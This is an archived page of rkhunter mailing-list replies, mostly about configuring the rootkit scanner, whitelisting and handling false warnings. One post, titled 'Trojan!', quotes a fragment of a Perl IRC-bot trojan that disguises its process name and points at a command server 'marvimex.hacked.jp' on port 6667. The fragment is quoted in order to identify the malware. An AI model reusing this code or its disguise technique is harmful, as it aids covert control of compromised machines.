Re: [Rkhunter-users] Intallation Error (INSTALLDIR)

ikipedia shows it on > > http://en.wikipedia.org/wiki/Rkhunter > Wow. Didn't know there was a wikipedia entry! :-) However it lists it as the 'Old rkhunter web page'. See the official web page at the bottom

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

On Tue, 2010-05-25 at 09:34 -0700, Duane Loftus wrote: > OK, time for dumb questions. > > 1. John Horne says: It hasn't installed properly, try re-installing. > The INSTALLDIR option must exist for RKH to run. > > Is there any guidance on re-installing? > Yes, look in

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

KH, then send us the output of the installer. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- ___ Rkhunter-users mailing lis

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

ackage manager option. FC6 won't be updated anymore, so all the current package files should correspond to their entries in the RPM database. John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

' config file ('/etc/rkhunter.conf.local'). This way when you next upgrade RKH, you do not have to modify the newly installed rkhunter.conf as all your settings will be in your local file. John. -- John Horne, University of Plymouth

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

alone, and then run RKH. Then only modify those options which cause a warning, everything else will be automatically detected. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587

Re: [Rkhunter-users] ssh protocol 1

es not need option 'Protocol' to be set? > No. From the config file: ...If the 'Protocol' option has not been set in the SSH # configuration file, then a value of '2' may be set here in order to # suppress a warning message. So set it to '2

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

When RKH runs it will look at '/etc/rkhunter.conf', but will then look at '/etc/rkhunter.conf.local' (if it exists) and override any previously set options. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

-147 lib]# more random-seed > You can't list it (using 'more'), because it is a binary/data file not a text file. See the 'file' command for help on that. John. -- John Horne, University of Plymouth, UK Tel: +4

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

run 'rkhunter --update --propupd' as I said? If not, then do it now. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- __

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

h '--propupd', then changed the config to use the package manager ('PKGMGR=RPM'). This would then make your current file properties report many warnings. If you change the config to use, or not use, the package manager for checks, then you must run 'rkhunter --propupd'

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

> A default install will put the rkhunter command into /usr/local/bin. So the full pathname should be '/usr/local/bin/rkhunter'. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- ___ Rkhunter-users mailing list Rkhunter-users@lists.sourceforge.net

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

t from lsmod, and found nothing in /proc/modules. For Fedora I would expect some modules to be loaded. However, if that is how your system runs (possibly due to plesk?), then you can disable the test. Copy the DISABLED_TESTS line from /etc/rkhunter.conf, and paste it into /etc/rkhunter.conf.local.

Re: [Rkhunter-users] whitelisting a setgid directory?

bitch. > As far as I am aware rkhunter doesn't care whether a directory has the setgid bit set or not. I would say, leave the above ALLOWHIDDENDIR option in your config file, and reset the permissions on the directory. John. -- John Horne, Univers

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

isable the 'apps' test completely. 2) Whitelist each of the applications - for example: APP_WHITELIST="httpd named openssl" 3) Install more up todate versions of the applications. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

go by the colour of the test result. If it's not red then don't worry about it. The skipped tests will be yellow simply to indicate that you may want to install the re

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

red. > Run rkhunter ('rkhunter -c') directly from a terminal, physical console or xterm. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- ___

Re: [Rkhunter-users] whitelisting a setgid directory?

On Tue, 2010-06-01 at 22:33 +0100, Adam McGreggor wrote: > On Sun, May 30, 2010 at 10:07:40PM +0100, John Horne wrote: > > On Sun, 2010-05-30 at 21:27 +0100, Adam McGreggor wrote: > > > I have a directory, /etc/.svn, which is setgid (2775/drwxrwsrx). > > > >

Re: [Rkhunter-users] Request: please build me a RPM on a 64-bit machine

> 32-bit system. Any x86_64 /usr/lib64 probs should have been gone > long time ago, our build process doesn't default to /usr/lib64 > (should be /usr/local anyway), so I'm looking for confirmation this > is a RPMForge packager problem. > Hi, Tee file will on its way

Re: [Rkhunter-users] Warning about suspscan directory

You could just set it to something like /var/tmp. However, I think /dev/shm was used because it is memory-resident, and so less intensive for the test. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -

Re: [Rkhunter-users] Warning when scanning /dev/shm

x27;t like the colon (:) characters. Already fixed in the CVS version though. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- ThinkGeek and WIRED's GeekDad team up

Re: [Rkhunter-users] Warning when scanning /dev/shm

Alternative is to use the current CVS version of rkhunter. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- ThinkGeek and WIRED's GeekDad team up for

Re: [Rkhunter-users] High CPU usage

w the servers CPU usage going up and down regularly. In that respect I have gotten used to it, and the users don't seem to notice it. Obviously if the usage stays high (or low!), then it is investigated. John. -- John Horne, University of Ply

Re: [Rkhunter-users] rkhunter actually running commands in the files check section

unning RKH with '--debug' might have indicated why. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- This SF.net email is sponsored by Sprint What will you d

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

ific files. (In your case it would be the 'hdparm' string in the /etc/rc.d/rc.sysinit and bootlogd files. This means you don't have to whitelist the files from all rootkit checks.) At the moment you will have to whitelist the files

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

atever command you use to run rkhunter and add the '--debug' option to it please. Then email me the resulting output file in /tmp. Also can you email me the log file (usually /var/log/rkhunter.log). Thanks, John.

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

of the whitelisting options are allowed to be specified more than once. I'll email you a drop-in corrected version of the 'rkhunter' program (it will still be version 1.3.6), that will allow your configuration above. It also contains the fix for the Mandriva 'rkhunter /b

Re: [Rkhunter-users] rkhunter actually running commands in the files check section

looks as if the program ran. The 'lsmod' command starts with a header line containing 'Module', and 'ipv6' and 'nf_conntrack_ipv4' are certainly module names. What I would like to see is the rkhunter log file for this, or better still output from a run when the

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

n email me the log file (/var/log/rkhunter.log). Thanks. > > I figure that maybe I need to run rkhunter --propupd > Nope, that's got nothing to do with it. John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001 -

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

un 'rkhunter --debug --version' and then email me (not the list) the file that is created in /tmp (named rkhunter-debug...). It should contain enough info to see what is going on. John. -- John Horne Tel: +44 (0)1752 587287 Univers

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

it does. If you really want to specify exactly should be checked, and what shouldn't, then maybe something like Aide or Tripwire would be more suitable. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

directories will be searched as well. Option 'b' can be achieved by setting USER_FILEPROP_FILES_DIRS="/usr/local/libexec", again other directories will be searched. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

On Wed, 2010-08-11 at 16:25 -0700, Jonny Kent wrote: > > > > err maybe that is a new flag. where is USER_FILEPROP_FILES_DIRS > documented? so I can't answer you fully. > Sorry, that was added in at version 1.3.6. Your original post said you were running 1.3.4 I th

Re: [Rkhunter-users] Lock File Error

art). By default it is not enabled, so you must have set USE_LOCKING=1 in the config file. To remove the lock file simply run: rkhunter --unlock John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -

Re: [Rkhunter-users] Lock File Error

On Wed, 2010-08-18 at 20:07 -0400, Mike Strickland wrote: > On Wed, 2010-08-18 at 21:35 +0100, John Horne wrote: > > This is rkhunter's locking mechanism to prevent 2 or more instances of > > RKH running together (and so messing up the log file for a start). By > > def

Re: [Rkhunter-users] Lock File Error

t is waiting for the lock, and show a count of the number of seconds in increments of 10 seconds. It will wait a maximum of 300 seconds (5 mins), but that is configurable. After that time it gives up. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287

Re: [Rkhunter-users] Burning rkhunter.dat to a CD and linking to file gives error

On Sat, 2010-08-21 at 16:30 -0700, Conrad Schuler wrote: > In the rkhunter.conf file it says to burn the rkhunter.dat to a CD and > link to it. > ?? Where on earth does it say that? John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)17

Re: [Rkhunter-users] Running processes false warning?

7;system'. > The test is for complete files names, not partial matches - so '.../system' matches, but '.../system_bus_socket' will not. Without seeing the lsof output, which has obviously changed by now, it is impossible to say what was matched. The test has been improve

Re: [Rkhunter-users] Running processes false warning?

On Mon, 2010-09-13 at 02:59 +0300, Nerijus Baliunas wrote: > On Thu, 09 Sep 2010 10:21:56 +0100 John Horne > wrote: > > > The test is for complete files names, not partial matches - so > > '.../system' matches, but '.../system_bus_socket' will not. With

Re: [Rkhunter-users] Running processes false warning?

On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote: > On Mon, 13 Sep 2010 11:56:03 +0100 John Horne > wrote: > > > > I have similar problem with wine. When there are no wine apps running, > > > I get no warning, but with wine running I get the warning. > &g

Re: [Rkhunter-users] Unhide testers wanted for Ruby version

) Seen by sched_rr_get_interval() # ps p 13864 PID TTY STAT TIME COMMAND # unhide.rb|wc -l 3287 # unhide.rb|grep '^ Seen by ps'|wc -l 295 I only showed the last PID found, but as can be seen it says it has found 295 suspicious PIDs. J

Re: [Rkhunter-users] Unhide testers wanted for Ruby version

On Thu, 2010-09-16 at 17:29 +0200, unsp...@hushmail.com wrote: > Hello John, > > On Tue, 14 Sep 2010 15:59:39 +0200 John Horne > wrote: > >I seem to get quite a few FP's from this: > > Do those still occur after using Walles' fix posted on SF? > No, th

Re: [Rkhunter-users] USER_FILEPROP_FILES_DIRS file generates complaint

d for file '/usr/local/bin/perl' in the > rkhunter.dat file. > What are the other values of USER_FILEPROP_FILES_DIRS you have configured? John. -- John Horne, University of Plymouth, UK Tel: +44 (0)

Re: [Rkhunter-users] Unhide testers wanted for Ruby version

hide sys" output is : > "HIDDEN Processes Found: number_of_hidden_processes" > Thanks for reporting this. It has been fixed in the next release. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001

Re: [Rkhunter-users] USER_FILEPROP_FILES_DIRS file generates complaint

rom the RKH config file: # NOTE: Only files and directories which have been added by the user, # and are not part of the internal lists, can be excluded. So, for # example, it is not possible to exclude the 'ps' command by using # '!/bin/ps'. These will be silently ignore

Re: [Rkhunter-users] Running processes false warning?

On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote: > On Mon, 13 Sep 2010 11:56:03 +0100 John Horne > wrote: > > > > I have similar problem with wine. When there are no wine apps running, > > > I get no warning, but with wine running I get the warning. > &g

Re: [Rkhunter-users] whitelisting files using deleted files

is whitelisted > > Am I missing anything? Do I have to whitelist apache2 with no specified > file? Any suggestion? > What have you put into the RKH config file for this? John. -- John Horne, Universit

Re: [Rkhunter-users] whitelisting files using deleted files

On Tue, 2010-09-28 at 10:26 +0200, William Maddler wrote: > On 27/09/2010 23:47, John Horne wrote: > > On Mon, 2010-09-27 at 12:53 +0200, William Maddler wrote: > >> Hello, > >> I keep getting a warning for apache2 using deleted files: > >> > >> [12:01

Re: [Rkhunter-users] Pass individual files to propupd option

On Thu, 2010-10-21 at 13:05 +0200, Leon Waldman wrote: > > Can any one tell me if it's possible to pass individual > filenames/paths to the propupd option? > Yes it is if you are running version 1.3.6. Look at the man page. John. -- John Horne, University of Plymouth, UK

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

27; letter, and not the same as the lowercase 'c' letter which is short for the '--check' option. Using '-C' (or '--checkconfig') simply runs through the configuration files and checks that they look okay, it then exits. It will not display anything if all

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

s 'head -1 /var/lib/rkhunter/db/i18n/en' show? John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001 -- Nokia and AT&T present the 2010 C

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

that instance RKH looks in the config file to see what tests are enabled, which by default is 'all'. When running specific tests I tend to just use: rkhunter --enable hidden_procs That is all that is required. If more than one test is to run, then just comma-separate them or use mult

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

On Tue, 2010-11-02 at 06:34 +0100, Patrick Gouin wrote: > Le 01/11/2010 18:51, John Horne a écrit : > > On Mon, 2010-11-01 at 17:02 +0100, Patrick Gouin wrote: > > > > Okay, but why does your path have a directory name with a trailing '/'? > > I'

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

[ Found ] > [20:21:27] Info: Found syslog configuration file: /etc/syslog.conf > > RKH should probably looks only for the config file corresponding to > the syslog utility it found just before. > I don't quite follow this. Are you saying: 1) that /etc/syslog.conf is a symbol

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

unning? > > > > > That's exactly what I mean except I would have written check instead of > show.. > Okay, I'll take a look and see if we can do something. John. -- John Horne, University of Plym

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

s, but I'll save them for a separate email and if I run > into any further issues I'll be back. > Okay, thanks again. One point, OS X does not have a /dev/shm directory, so if you want to run 'suspscan', then I tend to use: SUSPSCAN_TEMP=/var/lib/rkhunter/tmp or wherever y

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

it is doing. We should probably add 'launchd' itself to the list of monitored files for OS X as well (if we haven't already). John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001 -

Re: [Rkhunter-users] Boonana Trojan

ux/UNIX exploit with Boonana, only OS X and MS Windows. As such, at the moment, Boonana is only tested for on OS X. Obviously, anyone with any Linux/UNIX details, then please let us know :-) John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax

Re: [Rkhunter-users] OSX passwd file (was eliminate Dica-Kit Rootkit)

ver, OS X does not generally use the file. Passwords are maintained in a database, and not the passwd file. As far as I could gather the file *may* be used in some instances when sorting out problems with the machine. In that respect, it is not a full check of the user passwords, but may well be bet

[Rkhunter-users] Update for 1.3.8

Hello, If you have installed the new release of rkhunter (1.3.8), would you ensure you run 'rkhunter --update' after installation please. One of the data files had a small error in it which has now been corrected. Thanks, John. -- John Horne Tel: +44 (0)1

Re: [Rkhunter-users] Update for 1.3.8

uration option: Invalid directory found: ./ > > > > Could you help me? > > The BINDIR option, if not set on the command-line or in the config file, will use the root PATH variable. In this instance it seems the user has a relative path in PATH, and that is what RKH is complaining abou

Re: [Rkhunter-users] rkh 1.3.8 ignores processes allowed to use deleted files

; Any ideas please? > I can't see anything obviously wrong. Can you run: rkhunter --enable deleted_files --debug and email me the debug file created in /tmp. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 --

Re: [Rkhunter-users] rkh 1.3.8 ignores processes allowed to use deleted files

On Sat, 2010-11-20 at 16:30 +, John Horne wrote: > On Sat, 2010-11-20 at 14:17 +, Dick Gevers wrote: > > Hi, > > > > 1.3.8 works fine for me. Thanks for the latest version! > > > > Except it says in the logs: > > > > [23:51:10] Info: Sta

Re: [Rkhunter-users] Warning: Application 'gpg', version '1.4.10', is out of date, and possibly a security risk.

ions of RKH. New versions were released to coincide with 1.3.8 being released. As such users of 1.3.6 (and before) may well see results different from previously if they have run 'rkhunter --update' bec

Re: [Rkhunter-users] Ports checked questions

le hidden_ports" but in my case that gave me: > "Info: Unable to find the 'unhide-tcp' command" > Exactly. If your system doesn't have the unhide-tcp command then the check cannot run. It is disabled by default because most people won't have that command in

Re: [Rkhunter-users] rkhunter does not check /bin/ping ?

R_FILEPROP_FILES_DIR option. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! Tap into the

Re: [Rkhunter-users] rkhunter does not check /bin/ping ?

ss it's already known much longer, because i read an article about it, > in a "hackin9"-magazine from 2004! > Ping now added into CVS version. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)17

Re: [Rkhunter-users] Can't whitelist deleted files + Package manager verification

tem will re-prelink the files, and then the verification will pass. Alternatively, do as RKH suggests, run the 'prelink' command on the files - or use 'prelink -a' - and that should take care of it. Or you could disable prelinking completely of course. John. -- Joh

Re: [Rkhunter-users] compair rkhunter.log with rkhunter.log.old

ecause of the timestamp. The only thing I can suggest is to do a comparison with the timestamps removed. Something like: cat rkhunter.log | cut -d' ' -f2- >/tmp/rkh1 cat rkhunter.log.old | cut -d' ' -f2- >/tmp/rkh2 diff rkh1 rkh2 It is not ideal, but usable.

Re: [Rkhunter-users] compair rkhunter.log with rkhunter.log.old

summary). > You can combine options to get just the summary. Try using '-q --summary'. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- Lotusphere 2011 Reg

Re: [Rkhunter-users] Can't disable hidden_procs test

s > > which is clearly conflicting. > No it's not. That is the 'hidden_ports' test. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- Lotusp

Re: [Rkhunter-users] Run rkhunter on a remote machine

ly. As far as I am aware RKH has no '--file' option. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- Gaining the trust of online customers is vital for the suc

Re: [Rkhunter-users] Static IP for updating RKHunter

On Mon, 2011-01-17 at 11:33 -0500, James R. Marcus wrote: > Some of my machines are behind a strict firewall, is there a recommended > single mirror for RKHunter updates? > rkhunter.sourceforge.net John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +4

Re: [Rkhunter-users] installed RKH on mac os x 10.6.6 possible RK?

sh/sshd_config most other OSes use? > Yes, OSX does use /etc/sshd_config. It will be necessary to add to the users config file: RTKT_FILE_WHITELIST=/etc/sshd_config John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1

Re: [Rkhunter-users] installed RKH on mac os x 10.6.6 possible RK?

On Tue, 2011-01-25 at 12:18 -0500, d...@456ny.com wrote: > appreciate the response. > > how do i attach the log. > i cannot even locate the log file within osx > The log file path is by default /var/log/rkhunter.log John. -- John Horne, University of Plymouth, UK Tel: +44

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote: > Hello, > > I'm running rkhunter under FreeBSD. I have done so for many years. > After upgrading to rkhunter version 1.3.8, > Did you run 'rkhunter --propupd' after upgrading? John. -- John Horne

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

On Fri, 2011-02-04 at 14:03 +0100, Torfinn Ingolfsen wrote: > Hi, > > On Fri, Feb 4, 2011 at 12:36 PM, John Horne wrote: > > On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote: > >> Hello, > >> > >> I'm running rkhunter under FreeBSD. I ha

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

On Fri, 2011-02-04 at 17:58 +0100, Torfinn Ingolfsen wrote: > Hi, > > > On Fri, Feb 4, 2011 at 2:58 PM, John Horne wrote: > > Do you use the USER_FILEPROP_FILES_DIRS option at all in your config > > file(s)? If so can you show me what they are. > > I use the confi

Re: [Rkhunter-users] ALLOWDEVFILE (and others) with spaces in filenames?

at the lists of filenames as newline delimited, but that would then mean that users would have to enter each file on a separate line in the config file (whereas at present they can use space-separated lists). In answer to Kevin, as far as I can tell it is not possible to include a filenam

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

get their servers back up and running then the link should work again. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- The modern datacenter depends on network connec

Re: [Rkhunter-users] Trojan!

; -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]"); > my $processo = $ps[rand scalar @ps]; > > $servidor='marvimex.hacked.jp' unless $servidor; > my $porta='6667

Re: [Rkhunter-users] All file hash checks will be skipped(...)

m (or md5, sha1) commands in the root PATH. If they are not found, then rkhunter will use its own sha1/md5 perl function but only if perl is available. Can you run 'rkhunter --list perl' please. If it shows the Digest::MD5 and SHA1 modules installed, then can you check that the p

Re: [Rkhunter-users] All file hash checks will be skipped(...)

On Mon, 2011-02-28 at 01:22 +0100, Boris Cuber wrote: > (Btw., md5sum _is_ in the root path) > Sorry, just noticed this bit. Look in the /var/log/rkhunter.log file and ensure that the PATH used by RKH is what you expect it to be (and that md5sum is in that path). John. -- John

Re: [Rkhunter-users] rkhunter changes ctime & mtime during "properties" checking

mand I think). Yet on a non-prelinked system the mtime and ctime are unchanged but the atime is. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- Free Software Dow

Re: [Rkhunter-users] sshd Rootkit not detected by rkhunter

On Thu, 2011-04-21 at 16:25 +0200, Carlos Oliva wrote: > > I think a good add-on for rkhunter is inspect the MD5 of the packages, > Try the 'DPKG' package manager option in the config file. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax:

Re: [Rkhunter-users] About command options

; root > === > > As a result, now have received notification by e-mail "warning" . > I want to receive which is not "[ Warning ]" message, but "[ Bad ]" message. > > how to achieve this? > > Generally you can't. The only way you could do th

Re: [Rkhunter-users] Propupd on Rootkit Hunter v. 1.3.8

. What bug? John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- WhatsUp Gold - Download Free Network Management Software The most intuitive, comprehensive, and co

Re: [Rkhunter-users] suspscan string in /dev

> to see. I have commented out each prior to each string in hope not to > spread anything or cause any problems. They appear to be make or load > with some international connotation > Does the rkhunter log file not say which file it is found in? John. -- John Horne, University of

Re: [Rkhunter-users] Hidden ports found

27;t tried this version myself, but the later versions offered more options which may provide more info. http://www.unhide-forensics.info/?Download John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 ---

Re: [Rkhunter-users] deleted_files test and IFS

n. > Hello, Many thanks for this. The problem has already been fixed in the CVS version of rkhunter. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- vRange

Re: [Rkhunter-users] rkhunter has been replaced and is not a script...

give it a go and see if it fixes the problem. Thanks, John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287Fax: +44 (0)1752 587001 -- Simplify data backup and recovery for your virtual environm

Re: [Rkhunter-users] rkhunter has been replaced and is not a script...

will still monitor it for any future changes. If the fix for the 'file' command is included in a subsequent Fedora 'rkhunter' package, and you install that (via yum), then you should remove the config file option above and let the package manager revert to monitoring the progra

Re: [Rkhunter-users] Rootkit "NSDAP " detected on Solaris10 sparc.

ROP_FILES_DIRS="/usr/bin/mc68000 /usr/bin/mc68010 /usr/bin/mc68020 /usr/bin/mc68030 /usr/bin/mc68040 /usr/bin/m68k /usr/bin/sun2 /usr/bin/sun3 /usr/bin/sun3x /usr/bin/u370" Then run 'rkhunter --propupd'. John. -- John Horne Tel: +44 (0)1752 587287 University of

Re: [Rkhunter-users] Rootkit "NSDAP " detected on Solaris10 sparc.

g ] > /usr/ucb/file[ Warning ] > You will need to look in the log file (/var/log/rkhunter.log) to see why these warnings occur. John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001 ---

Re: [Rkhunter-users] Rootkit "NSDAP " detected on Solaris10 sparc.

lo, Yes, the SCRIPTWHITELIST option will whitelist commands which are scripts so use the lines above (they are included in the rkhunter.conf file just as examples). John. -- John Horne Tel: +44 (0)1752 587287 University

Re: [Rkhunter-users] rkhunter --propupd not working?

[ Warning ] > [08:05:51] Warning: The file properties have changed: > myhost : Mon Jun 27, 08:17:25 : ~ > # > > Anyone got any idea what could be causing this? > Hello, What version of rkhunter are you using? Also can you show us the full log entry for one of the files

Re: [Rkhunter-users] rkhunter --propupd not working?

On Mon, 2011-06-27 at 12:40 -0400, Tanstaafl wrote: > Thanks for the help John... > > On 2011-06-27 10:57 AM, John Horne wrote: > > What version of rkhunter are you using? > > 1.3.8 > > > Also can you show us the full log entry for one of the files with a > &

Re: [Rkhunter-users] rkhunter --propupd not working?

On Tue, 2011-06-28 at 10:54 -0400, Tanstaafl wrote: > On 2011-06-27 5:24 PM, John Horne wrote: > > The stored time is the modification time on the file when '--propupd' > > was last used, not the time when '--propupd' was run. > > Ok, I guess I'm ju

Re: [Rkhunter-users] rkhunter --propupd not working?

On Tue, 2011-06-28 at 14:26 -0400, Tanstaafl wrote: > On 2011-06-28 1:27 PM, John Horne wrote: > > When you run 'rkhunter --propupd' it creates a local database of the > > files to be monitored and records the modification date/time of each > > file. That date/time

<    1   2   3   4   5   6   7   8   9   10   >